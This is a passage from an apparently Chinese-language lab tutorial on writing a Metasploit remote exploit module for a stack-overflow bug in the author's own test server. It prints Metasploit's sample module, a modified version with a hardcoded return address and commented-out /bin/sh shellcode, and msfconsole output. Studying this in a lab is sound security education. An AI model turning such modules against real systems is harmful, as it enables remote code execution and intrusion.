有了漏洞我們就可以進行攻擊了。首先我們需要了解metasploit的exploit子產品,具體可以看 http://www.offensive-security.com/metasploit-unleashed/Exploit_Development
metasploit本身功能非常強大,這裡不多做介紹。
首先我們需要添加一個針對這個漏洞的exploit子產品,
我們直接在樣例上進行修改:
root@bt:~/.msf4/modules# mkdir exploits
root@bt:~/.msf4/modules# cd exploits
root@bt:~/.msf4/modules/exploits# mkdir linux
root@bt:~/.msf4/modules/exploits/linux# cp /pentest/exploits/framework/documentation/samples/modules/exploits/sample.rb myvictim.rb
root@bt:~/.msf4/modules/exploits/linux# ls
myvictim.rb myvictimserver.rb proftp_sreplace.rb
然後檢視myvictim.rb
##
# $Id: sample.rb 9212 2010-05-03 17:13:09Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
module Msf
###
#
# This exploit sample shows how an exploit module could be written to exploit
# a bug in an arbitrary TCP server.
#
###
class Exploits::Sample < Msf::Exploit::Remote
#
# This exploit affects TCP servers, so we use the TCP client mixin.
#
include Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'Sample exploit',
'Description' => %q{
This exploit module illustrates how a vu
lnerability could be exploited
in an TCP server that has a parsing bug.
},
'Author' => 'skape',
'Version' => '$Revision: 9212 $',
'References' =>
[
],
'Payload' =>
{
'Space' => 1000,
'BadChars' => "\x00",
},
'Targets' =>
[
# Target 0: Windows All
[
'Windows Universal',
{
'Platform' => 'win',
'Ret' => 0x41424344
}
],
],
'DefaultTarget' => 0))
end
#
# The sample exploit just indicates that the remote host is always
# vulnerable.
#
def check
return Exploit::CheckCode::Vulnerable
end
#
# The exploit method connects to the remote service and sends 1024 A's
# followed by the fake return address and then the payload.
#
def exploit
connect
print_status("Sending #{payload.encoded.length} byte payload..."
)
# Build the buffer for transmission
buf = "A" * 1024
buf += [ target.ret ].pack('V')
buf += payload.encoded
# Send it off
sock.put(buf)
sock.get
handler
end
end
end
然後我們需要把他添加進metasploit,運作reload_all
=[ metasploit v4.0.0-release [core:4.0 api:1.0]
+ -- --=[ 719 exploits - 361 auxiliary - 68 post
+ -- --=[ 226 payloads - 27 encoders - 8 nops
=[ svn r13462 updated 1208 days ago (2011.08.01)
Warning: This copy of the Metasploit Framework was last updated 1208 days ago.
We recommend that you update the framework at least every other day.
For information on updating your copy of Metasploit, please see:
https://community.rapid7.com/docs/DOC-1306
msf > reload_all
msf > use exploit/linux/my
use exploit/linux/mysql/mysql_yassl_getname use exploit/linux/myvictimserver
use exploit/linux/mysql/mysql_yassl_hello
這裡并沒有列出來我們剛剛添加的子產品,說明子產品有問題,必須修改,修改如下:
##
# $Id: myvictimserver.rb 9212 2014-11-03 17:13:09Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
###
#
# This exploit sample shows how an exploit module could be written to exploit
# a bug in an arbitrary TCP server.
#
###
class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking
#
# This exploit affects TCP servers, so we use the TCP client mixin.
#
include Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'MyVictimSever',
'Description' => %q{
This exploit module illustrates how a vulnerability could be exploited
in an TCP server that has a stackoverflow bug.
},
'Author' => 'bai',
'Version' => '$Revision: 9212 $',
'References' =>
[
],
'Payload' =>
{
'Space' => 116, #
'BadChars' => "\x00",
},
'Targets' =>
[
# Target 0: Windows All
[
'MyVictimSever run on linux',
{
'Platform' => 'Linux',
'Ret' => 0xbffff4a4
}
],
],
'DefaultTarget' => 0))
end
#
# The sample exploit just indicates that the remote host is always
# vulnerable.
#
def check
return Exploit::CheckCode::Vulnerable
end
#
# The exploit method connects to the remote service and sends 1024 A's
# followed by the fake return address and then the payload.
#
def exploit
connect
print_status("Sending #{payload.encoded.length} byte payload...")
# Build the buffer for transmission
buf="";
#buf = "\x90" * 15
#buf+="\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
#buf+="\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
#buf+="\x80\xe8\xdc\xff\xff\xff/bin/sh";
buf+="\xa4\xf4\xff\xbf"
buf += payload.encoded
buf += [].fill( target.ret,0,100).pack('V*')
# Send it off
sock.put(buf)
sock.get
handler
end
end
這時候,我們就可以找到這個子產品了。
msf > use exploit/linux/my
use exploit/linux/mysql/mysql_yassl_getname use exploit/linux/myvictim
use exploit/linux/mysql/mysql_yassl_hello use exploit/linux/myvictimserver
msf > use exploit/linux/my